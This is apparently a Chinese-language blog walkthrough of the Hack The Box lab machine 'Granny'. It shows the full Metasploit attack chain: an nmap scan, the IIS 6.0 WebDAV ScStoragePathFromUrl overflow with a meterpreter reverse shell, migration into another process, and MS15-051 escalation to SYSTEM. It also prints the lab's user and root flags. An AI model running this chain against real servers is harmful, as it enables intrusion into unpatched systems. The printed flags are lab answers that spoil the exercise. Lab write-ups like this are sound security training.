Please enable Javascript to view the contents

Granny 练习记录

 ·  ☕ 5 分钟  ·  ✍️ IceKam · 👀... 阅读

环境介绍:

名称:Granny

系统:Windows

信息搜集

获取目标

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
$ nmap -sV -O -F -oA Granny --version-light 10.10.10.15      
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 14:01 CST
Nmap scan report for 10.10.10.15
Host is up (0.46s latency).
Not shown: 99 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP (87%), Microsoft Windows 2000 SP4 (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows XP SP2 or Windows Server 2003 SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  • 这里可以看出80iis 6.0,系统为windows Xp系统。

Granny

  • Web也木有什么。

shell获取

漏洞枚举

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
$ searchsploit IIS 6.0  
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal I | exploits/windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Wind | exploits/windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Sta | exploits/windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Re | exploits/windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow | exploits/windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStorageP | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8806.pl
Microsoft IIS 6.0/7.5 (+ PHP) - Multip | exploits/windows/remote/19033.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
  • 找到一个远程执行的ScStorageP

搜索漏洞

1
2
3
4
5
6
7
8
msf5 > search ScStorageP

Matching Modules
================

   ##  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes     Microsoft IIS WebDav ScStoragePathFromUrl Overflow
  • 可用。

载入漏洞

1
msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl

配置漏洞

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
msf5 > search ScStorageP

Matching Modules
================

   ##  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes     Microsoft IIS WebDav ScStoragePathFromUrl Overflow


msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options 

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86


msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15
RHOSTS => 10.10.10.15
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options 

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         10.10.10.15      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86


msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.16
LHOST => 10.10.14.16
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.16:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (180291 bytes) to 10.10.10.1
  • 这里要注意VPN导致反弹卡住的情况,所以要手动设置本地IP。

提权

注入进程

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
meterpreter > shell
Process 2868 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\network service

C:\WINDOWS\system32>exit
exit
meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                                
 4     0     System                                                          
 276   4     smss.exe                                                        
 324   276   csrss.exe                                                       
 348   276   winlogon.exe                                                    
 396   348   services.exe                                                    
 408   348   lsass.exe                                                       
 608   396   svchost.exe                                                     
 684   396   svchost.exe                                                     
 744   396   svchost.exe                                                     
 776   396   svchost.exe                                                     
 804   396   svchost.exe                                                     
 940   396   spoolsv.exe                                                     
 968   396   msdtc.exe                                                       
 1080  396   cisvc.exe                                                       
 1136  396   svchost.exe                                                     
 1184  396   inetinfo.exe                                                    
 1220  396   svchost.exe                                                     
 1332  396   VGAuthService.exe                                               
 1412  396   vmtoolsd.exe                                                    
 1460  396   svchost.exe                                                     
 1600  396   svchost.exe                                                     
 1712  396   alg.exe                                                         
 1840  608   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1920  396   dllhost.exe                                                     
 2196  1460  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2304  1080  cidaemon.exe                                                    
 2348  1080  cidaemon.exe                                                    
 2376  1080  cidaemon.exe                                                    
 2392  608   wmiprvse.exe                                                    
 2944  348   logon.scr                                                       
 3104  608   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe

meterpreter > migrate 3104
[*] Migrating from 1840 to 3104...
[*] Migration completed successfully.```

> * 现将用户注入到`NETWORK SERVICE`
### 后台运行

```bash
meterpreter > background 
[*] Backgrounding session 1...```

### 本地漏洞枚举

```bash
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1 
SESSION => 2
msf5 post(multi/recon/local_exploit_suggester) > run
  • 直接使用local_exploit_suggester跑一波。
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 29 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
  • 枚举成功,ms15_051_client_copy_image可用。

载入漏洞

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image
msf5 exploit(windows/local/ms15_051_client_copy_image) > show options 

Module options (exploit/windows/local/ms15_051_client_copy_image):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf5 exploit(windows/local/ms15_051_client_copy_image) > set session 1 
session => 1
msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.14.16
LHOST => 10.10.14.16
msf5 exploit(windows/local/ms15_051_client_copy_image) > run 

[*] Started reverse TCP handler on 10.10.14.16:4444 
[*] Launching notepad to host the exploit...
[+] Process 3380 launched.
[*] Reflectively injecting the exploit DLL into 3380...
[*] Injecting exploit into 3380...
[*] Exploit injected. Injecting payload into 3380...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.16:4444 -> 10.10.10.15:1036) at 2019-10-29 14:59:03 +0800

meterpreter > shell
Process 2356 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system
  • 提权成功。

flag

C:\WINDOWS\system32>cd c:\
cd c:\

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\

04/12/2017  04:27 PM    <DIR>          ADFS
04/12/2017  04:04 PM                 0 AUTOEXEC.BAT
04/12/2017  04:04 PM                 0 CONFIG.SYS
04/12/2017  09:19 PM    <DIR>          Documents and Settings
04/12/2017  04:17 PM    <DIR>          FPSE_search
04/12/2017  04:17 PM    <DIR>          Inetpub
12/24/2017  07:21 PM    <DIR>          Program Files
12/24/2017  07:30 PM    <DIR>          WINDOWS
04/12/2017  04:05 PM    <DIR>          wmpub
               2 File(s)              0 bytes
               7 Dir(s)  18,126,544,896 bytes free

C:\>cd Documents and Settings
cd Documents and Settings

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  09:19 PM    <DIR>          .
04/12/2017  09:19 PM    <DIR>          ..
04/12/2017  08:48 PM    <DIR>          Administrator
04/12/2017  04:03 PM    <DIR>          All Users
04/12/2017  09:19 PM    <DIR>          Lakis
               0 File(s)              0 bytes
               5 Dir(s)  18,126,544,896 bytes free

C:\Documents and Settings>cd Lakis
cd Lakis

C:\Documents and Settings\Lakis>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Lakis

04/12/2017  09:19 PM    <DIR>          .
04/12/2017  09:19 PM    <DIR>          ..
04/12/2017  09:19 PM    <DIR>          Desktop
04/12/2017  09:19 PM    <DIR>          Favorites
04/12/2017  09:19 PM    <DIR>          My Documents
04/12/2017  03:42 PM    <DIR>          Start Menu
04/12/2017  03:44 PM                 0 Sti_Trace.log
               1 File(s)              0 bytes
               6 Dir(s)  18,126,544,896 bytes free

C:\Documents and Settings\Lakis>cd Desktop
cd Desktop

C:\Documents and Settings\Lakis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Lakis\Desktop

04/12/2017  09:19 PM    <DIR>          .
04/12/2017  09:19 PM    <DIR>          ..
04/12/2017  09:20 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,126,540,800 bytes free

C:\Documents and Settings\Lakis\Desktop>type user.txt
type user.txt
700c5dc163014e22b3e408f8703f67d1


C:\Documents and Settings\Lakis\Desktop>cd ../../
cd ../../

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  09:19 PM    <DIR>          .
04/12/2017  09:19 PM    <DIR>          ..
04/12/2017  08:48 PM    <DIR>          Administrator
04/12/2017  04:03 PM    <DIR>          All Users
04/12/2017  09:19 PM    <DIR>          Lakis
               0 File(s)              0 bytes
               5 Dir(s)  18,126,594,048 bytes free

C:\Documents and Settings>cd Administrator/Desktop
cd Administrator/Desktop

C:\Documents and Settings\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Administrator\Desktop

04/12/2017  04:28 PM    <DIR>          .
04/12/2017  04:28 PM    <DIR>          ..
04/12/2017  09:17 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,126,594,048 bytes free

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
aa4beed1c0584445ab463a6747bd06e9
C:\Documents and Settings\Administrator\Desktop>

心得

经典Windows低版本漏洞MSF利用,和grandpa差不多。

分享
您的鼓励是我最大的动力
bitcoin QR Code

icekam
作者
IceKam
茶艺品鉴砖家,低端码字人口。